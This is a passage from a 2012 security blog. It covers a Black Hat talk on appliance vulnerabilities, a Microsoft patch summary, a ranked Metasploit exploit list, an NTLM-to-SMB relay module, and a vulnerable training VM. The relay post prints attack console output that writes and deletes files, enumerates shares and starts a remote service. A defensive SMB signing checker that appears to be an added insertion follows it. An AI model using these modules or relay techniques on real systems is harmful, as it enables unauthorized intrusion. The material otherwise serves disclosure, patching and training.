Tuesday, July 31, 2012

Blackhat 2010 - The Emperor Has No Clothes: Insecurities in Security Infrastructure

Blackhat 2010 - The Emperor Has No Clothes: Insecurities in Security Infrastructure: BEN FEINSTEIN, JEFF JARMOC & DAN KING

Your security infrastructure (firewalls, IDS/IPS devices, management consoles, etc.) holds a very sensitive position of trust. This equipment is relied upon to reliably perform security critical functions under potentially hostile conditions. These are highly valuable assets to an attacker, yet their value is sometimes not captured by conventional risk management. This presentation will explore several new vulnerabilities and weaknesses in these products, with the goal of offering useful recommendations and approaches for mitigating the risk.

This presentation explores a series of vulnerabilities and weaknesses in security infrastructure that we discovered and responsibly disclosed. We're in the business of managing and monitoring this gear for our clients, so we have great familiarity with all aspects of its operation. We've found that security infrastructure appears to be just as prone to security vulnerabilities as other commercial software, if not more so.

Daniel King discovered McAfee Network Security Manager (the web-based management appliance for McAfee IPS sensors) was vulnerable to authentication bypass / session hijacking (CVE-2009-3565) and cross-site scripting (CVE-2009-3566) vulnerabilities. We'll demonstrate a proof-of-concept attack scenario that blends these vulnerabilities to gain unauthorized access to the NSM web management interface through cookie stealing and hijacking an administrator's session.

Jeff Jarmoc discovered an access-control list (ACL) bypass vulnerability in Cisco Adaptive Security Appliance (ASA) and Cisco PIX (CVE-2009-1160, Cisco Bug ID CSCsq91277). These devices would fail to apply the expected implicit deny behavior for packets that did not match any ACEs in an ACL.

The TLS renegotiation vulnerability publicly disclosed in November 2009 (CVE-2009-3555) impacted many products, including Cisco Adaptive Security Device Manager (ASDM) (Cisco Bug ID CSCtd00697). We will demonstrate a never before seen proof-of-concept attack that exploits the TLS authentication gap to achieve arbitrary command injection against the Cisco ASDM web-based management interface. A man-in-the-middle may arbitrarily manipulate the ASA policies managed by an ASDM by exploiting the TLS authentication gap. Cisco fixed this in a general deployment release on January 11, 2010 with version 8.2(2). If you haven't patched before seeing this demo, you will want to afterward!

Using these vulnerabilities and weaknesses as illustrative examples, we will offer real-world recommendations on how to better secure your organization's security infrastructure. Some recommendations include treating your security infrastructure as in scope during penetration testing and security assessment activities, including product security in your organization's purchasing and product evaluation processes, and, somewhat ironically, deploying security products in the role of compensating controls for potential vulnerabilities in other parts of your organization's security infrastructure.

Wednesday, July 11, 2012

Microsoft Patch Tuesday July 2012 – TLS and Office for Mac?

We have nine bulletins to deal with this month, three of which are rated critical. One of those critical bulletins covers two CVEs in Internet Explorer, with the other two critical bulletins in different parts of Windows. We are looking at a total of 16 CVE numbers this month across all the bulletins. I found two of these particularly interesting: MS12-049 for its implication in encrypted communications and MS12-051 because you just don't see OSX application vulnerabilities every day.
Remote Code Execution in XML Core Services
Microsoft has seen use of this one in the wild already, not a lot, but it is out there. The problem lies with XML services, again. You will need to visit a specially crafted web page in order for an attacker to take advantage of this vulnerability but with today’s phishing techniques that’s not too hard. Once you’ve visited that special webpage an attacker has the capability for remote code execution. Not a good thing.  The update changes the way that MSXML initializes objects in memory and applies to Microsoft XML Core Services 3.0 thru 6.0, whether it is critical or moderate depends on specifically which OS and which other applications are installed.
Cumulative Security Update for Internet Explorer
CVE-2012-1522  CVE-2012-1524
A two-fer! 1 bulletin for 2 vulnerabilities! Again we are dealing with a specially crafted webpage, a link to which can be easily delivered via email or instant message, so always be careful what you click on. If you do click on a bad link this vulnerability will take advantage of issues in Internet Explorer 9 to give the current user's rights to the attacker or allow remote code execution. One deals with how IE handles deleted items, the other with objects in memory. Either way, if you run as an admin, which many people do, well, game over. Thankfully this one has not been seen in the wild, yet.
Remote Code Execution in MS Data Access Components
The final critical bulletin for this month can be found in the Microsoft Data Access components of Windows. Again, an attacker would use a specially crafted web page to launch their attack and would end up with the access rights of the currently logged in user or could run arbitrary code on the target system. So, don’t go surfing the Internet logged in as Admin.
Remote Code Execution in Visual Basic
So if you open a perfectly good MS Office file (such as a .docx) that just happens to have a specially crafted DLL in the same directory, an attacker can then do all kinds of nasty things like delete files, create new accounts, etc… and if you're logged in as admin, well, then the bad guys basically own the whole box. So if you have the Visual Basic for Applications SDK, or third party applications that use MS VBA, or even one of several different versions of MS Office installed, you will need this update. Since this one has been seen in the wild you will want to apply this update as soon as you can.
Elevation of Privilege in Kernel-Mode Drivers
CVE-2012-1890 CVE-2012-1893
Another two-fer! No specially crafted web page needed for this one, just a valid set of logon credentials. Once logged in an attacker can run an application that takes advantage of flaws in win32k.sys, a kernel-mode driver. This would allow her to do things her account might not normally be able to do like install apps, delete data or even create new accounts.
Remote Code Execution in Windows Shell
So what is Windows Shell? It's not the command line, it's a service that manages virtual objects in the user interface into a hierarchical namespace so that users and applications know where the hell to find things. Anyway, this vulnerability deals with object names, specifically file and directory names. To exploit this vulnerability someone would email you a file, or convince you to download a file from a website, and when you attempted to run that file the attacker would end up with what would basically amount to complete control of your machine. Ouch.
Information Disclosure in TLS
TLS is the Transport Layer Security Handshake Protocol and is very similar to SSL. SSL is the predecessor of TLS, they are used to encrypt communication sessions between hosts. If the Cipher-block chaining (CBC) method of TLS is used then an attacker could decrypt intercepted encrypted traffic. The update modifies the way that the Windows Secure Channel and the Cryptography API handle encrypted packets. While this vulnerability has been publicly disclosed already it has not yet been seen in the wild, thank goodness, but yeah, patch as soon as you can.
Elevation of Privilege in SharePoint
CVE-2012-1858  CVE-2012-1859  CVE-2012-1860   CVE-2012-1861 
CVE-2012-1862  CVE-2012-1862  CVE-2012-1863
Two-fer? How about a seven-fer? That's right, this one bulletin corrects seven CVEs. They all have to do with SharePoint, both 2007 and 2010, but you will also need this update if you are running InfoPath or Groove Server. The issues mostly revolve around how SharePoint handles HTML strings and how it validates and sanitizes user input. While it looks like CVE-2012-1858 has been publicly disclosed, Microsoft hasn't seen any of these being actively exploited in the wild, yet.
Elevation of Privilege in MS Office for Mac
You may not see OSX application vulnerabilities every day, but they do in fact exist. Although in this case actually exploiting it takes more than a few steps. First an attacker needs to get a specially crafted application into the Microsoft Office folder on an OSX machine and then convince a different user to execute it, preferably one with higher privileges than the attacker. It comes down to the default permissions set on the MS Office for Mac folder, which this update addresses, so this is more of a luring attack than a direct elevation of privilege.

Tuesday, July 10, 2012

Exploit Trends: New Microsoft and MySQL Exploits Make the Top 10

Exploit Database (DB)
The new Metasploit exploit trends are out, where we give you a list of the top 10 most searched Metasploit exploit and auxiliary modules from our exploit database (DB). These stats are collected by analyzing searches on metasploit.com in our webserver logs, not through usage of Metasploit, which we do not track for privacy reasons.

In June 2012, we also have three new entries on the list, and seven existing contenders. Here they are, annotated with Tod Beardsley's excellent comments:

  1. Microsoft Server Service Relative Path Stack Corruption (CVE-2008-4250, MSB-MS08-067): A four year old vulnerability that tends to give the most reliable shells on Windows 2003 Server and Windows XP. It’s also got a great pile of language pack targets. All of Metasploit’s exploits provide US English targeted shellcode, a few might provide Chinese, Spanish, French, or other popular languages; this one has targets in pretty much every language you’ve ever heard of. This exploit is also not ancient, so it’s reasonable to expect to find some unpatched systems in a medium to large enterprise vulnerable to it. More on this topic at Microsoft’s Security TechCenter. Same position as last month.
  2. MS12-020 Microsoft Remote Desktop Use-After-Free DoS (CVE-2012-0002, MSB-MS12-020): This is the 2012 RDP Bug, where it was implied -- but never proven in public -- that a pre-auth bug in RDP can allow for remote code execution. This is likely the most popular module we have due to both recency bias and because there was an unusual level of spontaneous organization of the Metasploit developer community to search for the correct path to remote code execution. So far, nobody’s gotten RCE yet (in public), but the Metasploit module provides the most clues. More on this topic in an article on ZD Net. Same position as last month.
  3. Microsoft Server Service NetpwPathCanonicalize Overflow (CVE-2006-3439, MSB-MS06-040): A six year old vulnerability that's notable in that there's no official patch from Microsoft for this on Windows NT 4.0. This was discovered after NT went end-of-life, so if you need remote root on an NT machine (and there are still plenty out there), this is going to be your first choice. More on this topic at Microsoft's Security TechCenter. Same position as last month.
  4. Microsoft RPC DCOM Interface Overflow (CVE-2003-0352, MSB-MS03-026): A nine year old vulnerability that used to be the de-facto standard exploit for Windows machines - this is the RPC DCom bug, and it affects ancient NT machines. It was most notable in that it was used by the Blaster and Nachi worms to transit networks. It’s now pretty much a case study in stack buffer overflows in Windows, so it’s got a lot of historical value. If memory serves, this was the most reliable exploit in Metasploit v2. More info on that at Windows IT Pro. Up 2 places from #6 since last month.
  5. MS12-037 Internet Explorer Same ID Property Deleted Object Handling Memory Corruption (CVE-2012-1875): This module was mentioned in the IE Zero-Day Exploits blog post along with the XML Core Services bug, CVE-2012-1889. Also like the XML Core services bug, this bug was being actively exploited in the wild in June of 2012. Unlike the XML Core Services bug, though, this one had a patch. I suspect there was some confusion about which bug was patched and which wasn't, given the modules were released close together and both were mentioned in the same post. Regardless, given the recency of these modules, it's not surprising to see them leap into the top ten for June. New entry since last month.
  6. Microsoft XML Core Services MSXML Uninitialized Memory Corruption (CVE-2012-1889): This vulnerability was recently profiled in Wei "sinn3r" Chen's blog post, New Critical Microsoft IE Zero-Day Exploits. As the title suggests, this module exploits an unpatched vulnerability in Internet Explorer, so that's pretty exciting just in and of itself. In addition, this Metasploit module is the first (and still only) safe and reliable method to test the efficacy of whatever mitigation strategy your client workstations might have implemented.  New entry since last month.
  7. Microsoft Windows 7 / Server 2008 R2 SMB Client Infinite Loop (CVE-2010-0017, MSB-MS10-006): Not sure why this module is popular -- it’s a client side DoS. Historically, it’s a neat DoS, since it demos a bug in Windows 7’s kernel, but all the module does is crash Windows 7 clients after you get a user to connect to you. More info on that at The H Security. Same position as last month.
  8. Microsoft Windows Authenticated User Code Execution (CVE-1999-0504): The PSExec module is a utility module -- given an SMB username and password with sufficient privileges on the target machine, the user can get a shell. It's not sexy, but it's super handy for testing payloads and setup. Even though it's a lowly #10, I'd bet it's the most-used module in classroom and test environments. More on this topic at the National Vulnerability Database. Up 2 from #10 since last month.
  9. MySQL Authentication Bypass Password Dump (CVE-2012-2122): This module was featured in HD Moore's June blog post, CVE-2012-2122: A Tragically Comedic Security Flaw in MySQL. It's a fun, recent module that exploits a bug in a popular application in a way that's super-easy to explain, so it's no wonder that this module has all the features of a crowd-pleaser. New entry since last month.
  10. Adobe PDF Embedded EXE Social Engineering (CVE-2010-1240): This module exploits CVE-2010-1240 in Adobe Reader. The idea is that you can embed and execute a Meterpreter PE Executable in a PDF, and when the user opens the PDF, surprise shells! Since it's on this list, it's probably the most popular social engineering-style module. More on this topic at the National Vulnerability Database. Down 2 places from #8 since last month.
If you want to use any of these exploits right now, you can download Metasploit for free!

Cross-Protocol Chained Pass the Hash for Metasploit

Every so often someone writes a Metasploit Module that is pretty epic. Today is one such day:
Twitter Link: https://twitter.com/webstersprodigy/status/222529916783169536
Which has a link to here: https://github.com/rapid7/metasploit-framework/pull/589
Demo / Example resource files: https://skydrive.live.com/?cid=19794fac33285fd5&resid=19794FAC33285FD5!170&id=19794FAC33285FD5%21170
You can pull the fork w/ branch from here: https://github.com/webstersprodigy/metasploit-framework/tree/module-http-ntlmrelay
And as soon as you do you can start doing this (using the example resource file to put a file, cat it out, enum shares available, list files on a share, then psexec all from a single URL being loaded):
The 163 address is the victim I tricked into loading a URL and 182 is the system I want to get onto. This is an HTTP request resulting in an SMB relayed auth. It looks as though multiple targets can be used as relay targets, but I haven't tested this out yet.
[*] http_ntlmrelay - NTLM Request '/smb_put' from
[*] http_ntlmrelay - Beginning NTLM Relay...
[*] http_ntlmrelay - SMB auth relay succeeded
[*] http_ntlmrelay - File \\\c$\secret.txt written
[*] http_ntlmrelay - NTLM Request '/smb_get' from
[*] http_ntlmrelay - Beginning NTLM Relay...
[*] http_ntlmrelay - SMB auth relay succeeded
[*] http_ntlmrelay - Reading 13 bytes from
[*] http_ntlmrelay - ----Contents----
[*] http_ntlmrelay - hi ima secret
[*] http_ntlmrelay - ----End Contents----
[*] http_ntlmrelay - NTLM Request '/smb_enum' from
[*] http_ntlmrelay - Beginning NTLM Relay...
[*] http_ntlmrelay - SMB auth relay succeeded
[*] http_ntlmrelay - Shares enumerated IPC$ADMIN$C$
[*] http_ntlmrelay - NTLM Request '/smb_ls' from
[*] http_ntlmrelay - Beginning NTLM Relay...
[*] http_ntlmrelay - SMB auth relay succeeded
[*] http_ntlmrelay - Listed 13 files from\c$\
[*] http_ntlmrelay - .rnd
[*] http_ntlmrelay - PerfLogs
[*] http_ntlmrelay - config.sys
[*] http_ntlmrelay - inetpub
[*] http_ntlmrelay - xampp
[*] http_ntlmrelay - ProgramData
[*] http_ntlmrelay - MSOCache
[*] http_ntlmrelay - secret.txt
[*] http_ntlmrelay - autoexec.bat
[*] http_ntlmrelay - Windows
[*] http_ntlmrelay - Users
[*] http_ntlmrelay - Program Files
[*] http_ntlmrelay - NTLM Request '/smb_rm' from
[*] http_ntlmrelay - Beginning NTLM Relay...
[*] http_ntlmrelay - SMB auth relay succeeded
[*] http_ntlmrelay - File \\\c$\secret.txt deleted
[*] http_ntlmrelay - NTLM Request '/smb_pwn' from
[*] http_ntlmrelay - Beginning NTLM Relay...
[*] http_ntlmrelay - SMB auth relay succeeded
[*] http_ntlmrelay - Obtraining a service manager handle...
[*] http_ntlmrelay - Creating a new service
[*] http_ntlmrelay - Closing service handle...
[*] http_ntlmrelay - Opening service...
[*] http_ntlmrelay - Starting the service...
Let the fun begin...
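The relay shown above only works against an SMB server that does not require message signing, so the defender-side check that matters is the signing policy each host advertises in its NEGOTIATE response. The following parser is an added example, not code from the original post or from the Metasploit module; it reads the SecurityMode field of SMB2/3 and SMB1 NEGOTIATE responses (field layouts per MS-SMB2 and MS-CIFS) and classifies the relay exposure. The sample responses are constructed inline, not captured traffic.

```python
import struct

# SecurityMode flags in an SMB2 NEGOTIATE response (MS-SMB2 2.2.4)
SMB2_SIGNING_ENABLED = 0x0001
SMB2_SIGNING_REQUIRED = 0x0002
# SecurityMode bits in an SMB1 NT LM 0.12 NEGOTIATE response (MS-CIFS 2.2.4.52.2)
SMB1_SIGNING_ENABLED = 0x04
SMB1_SIGNING_REQUIRED = 0x08


def parse_negotiate_signing(msg: bytes) -> dict:
    """Extract the server's signing policy from a raw NEGOTIATE response
    (4-byte NetBIOS session header already stripped). Handles SMB2/3 and SMB1."""
    if msg[:4] == b"\xfeSMB":
        if len(msg) < 70:
            raise ValueError("truncated SMB2 negotiate response")
        hdr_len, = struct.unpack_from("<H", msg, 4)     # header StructureSize
        command, = struct.unpack_from("<H", msg, 12)    # 0x0000 = SMB2 NEGOTIATE
        if hdr_len != 64 or command != 0x0000:
            raise ValueError("not an SMB2 NEGOTIATE response")
        mode, dialect = struct.unpack_from("<HH", msg, 66)  # after body StructureSize
        return {"dialect": f"SMB2 0x{dialect:04x}",
                "signing_enabled": bool(mode & SMB2_SIGNING_ENABLED),
                "signing_required": bool(mode & SMB2_SIGNING_REQUIRED)}
    if msg[:4] == b"\xffSMB":
        if len(msg) < 36 or msg[4] != 0x72:             # 0x72 = SMB_COM_NEGOTIATE
            raise ValueError("not an SMB1 NEGOTIATE response")
        mode = msg[35]  # 32-byte header, WordCount, DialectIndex(2), SecurityMode
        return {"dialect": "SMB1 NT LM 0.12",
                "signing_enabled": bool(mode & SMB1_SIGNING_ENABLED),
                "signing_required": bool(mode & SMB1_SIGNING_REQUIRED)}
    raise ValueError("unknown protocol header")


def relay_exposure(policy: dict) -> str:
    """Classify what a relayed NTLM authentication could do against this host."""
    if policy["signing_required"]:
        return "protected: server requires signing, relayed session cannot sign"
    if policy["signing_enabled"]:
        return "exposed: signing only negotiated, client can be relayed unsigned"
    return "exposed: signing disabled, relayed authentication accepted"


# --- constructed sample responses (hypothetical, not captured traffic) ---
def build_smb2_negotiate(security_mode: int) -> bytes:
    hdr = b"\xfeSMB" + struct.pack("<HHIHHIIQIIQ", 64, 0, 0, 0, 1, 1, 0, 0, 0, 0, 0)
    hdr += b"\x00" * 16                                  # Signature
    body = struct.pack("<HHHH", 65, security_mode, 0x0210, 0) + b"\x00" * 16  # ServerGuid
    body += struct.pack("<IIIIQQHHI", 0, 0x800000, 0x800000, 0x800000, 0, 0, 128, 0, 0)
    return hdr + body


def build_smb1_negotiate(security_mode: int) -> bytes:
    hdr = b"\xffSMB" + struct.pack("<BIBH", 0x72, 0, 0x88, 0xC801) + b"\x00" * 20
    params = struct.pack("<BHB", 17, 0, security_mode) + b"\x00" * 31  # 17 words
    return hdr + params + struct.pack("<H", 0)           # ByteCount = 0


if __name__ == "__main__":
    for sample in (build_smb2_negotiate(0x03), build_smb2_negotiate(0x01),
                   build_smb1_negotiate(0x03)):
        policy = parse_negotiate_signing(sample)
        print(policy["dialect"], "->", relay_exposure(policy))
```

Only a host that reports signing as required defeats the relayed session; "enabled but not required" still leaves the door open to a relayed client that negotiates signing off.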

Monday, July 2, 2012


It always helps to have a test bed that helps you hone your attacking skills. GameOver is a new offering from the NULL community that helps you do that even if you are a newbie!
GameOver 0.1
Simply put, Project GameOver was started with the objective of training and educating newbies about the basics of web application security, educating them about the common web attacks and helping them understand how they work. It is a collection of various vulnerable web applications, designed with the purpose of learning web application penetration testing. GameOver is a Virtual Machine image, built upon Voyage Linux as its base OS. Voyage is a minimalistic Linux distribution which is in turn based on Debian. For ease of use, GameOver has been broken down into two sections:
  • Section 1 consists of special web applications that are designed to teach the basics of web application security. This section covers vulnerabilities such as:
  • Section 2 is a collection of deliberately insecure web applications. It provides a legal platform to test your skills and to try and exploit the vulnerabilities and sharpen your skills before you pentest live sites. These applications provide real life environments and will boost your confidence.

Applications contained in GameOver:

  • Section 1:
    1. Damn Vulnerable Web Application: (http://www.dvwa.co.uk/)
    2. OWASP WebGoat:(https://www.owasp.org/index.php/Category:OWASP_WebGoat_Project)
    3. Ghost (http://www.gh0s7.net/)
    4. Mutillidae (http://www.irongeek.com/i.php?page=mutillidae/mutillidae-deliberately-vulnerable-php-owasp-top-10)
    5. Zap-Wave: (http://code.google.com/p/zaproxy/)
  • Section 2:
    1. Owasp Hacademic Challenges : (https://www.owasp.org/index.php/OWASP_Hackademic_Challenges_Project)
    2. Owasp Vicnum: (https://www.owasp.org/index.php/Category:OWASP_Vicnum_Project)
    3. WackoPicko: (http://www.aldeid.com/wiki/WackoPicko)
    4. Owasp Insecure Web App: (https://www.owasp.org/index.php/Category:OWASP_Insecure_Web_App_Project)
    5. BodgeIT: (http://code.google.com/p/bodgeit/)
    6. PuzzleMall: (https://code.google.com/p/puzzlemall/)
    7. WAVSEP: (https://code.google.com/p/wavsep/)
We have covered almost all of these in our previous posts. You may look them up by searching through the blog. Unfortunately, though there is an .ISO provided, in its current version GameOver cannot be installed in a virtual environment. It needs to be run as a Live image and you can log in with the following credentials:
Username: root
Password: gameover

Download GameOver:

GameOver v1.1
GameOver_v0.1_Null_VM.7z / GameOver.0.1.null.iso
http://sourceforge.net/projects/null-gameover/files/